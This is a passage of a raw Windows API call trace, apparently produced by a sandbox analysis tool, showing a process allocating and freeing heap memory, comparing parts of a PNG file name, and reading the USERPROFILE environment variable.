(HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa61b0 [0211.991] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b48 [0211.991] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y1E-1EvHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1E-1EvHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-1EvHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-1EvHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1EvHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EvHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vHMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HMk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Mk4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="d A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="A6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QVp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Vp8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p8.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0211.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6680 [0211.992] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6680 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0211.992] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6370 | out: hHeap=0x2af0000) returned 1 [0211.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0211.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0211.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.993] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0211.993] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0211.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0211.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71aa8 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.993] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0211.993] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.993] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa660 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa720 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.994] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b38 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa780 | out: hHeap=0x2af0000) returned 1 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.994] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3ee0 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0211.994] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b18 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a7a350 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0211.995] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.995] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.995] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa588 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0211.996] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a350 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa570 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x29f3f58 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0211.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa660 | out: hHeap=0x2af0000) returned 1 [0211.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0211.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a58 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0211.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719e8 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0211.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa828 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719d8 [0211.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6c0 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0211.997] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa780 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0211.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0211.998] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a28 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.998] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.998] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0211.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0211.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5edc0 | out: hHeap=0x2af0000) returned 1 [0211.999] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0211.999] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6a8 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5a0 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0211.999] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6a8 | out: hHeap=0x2af0000) returned 1 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5d0 | out: hHeap=0x2af0000) returned 1 [0212.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 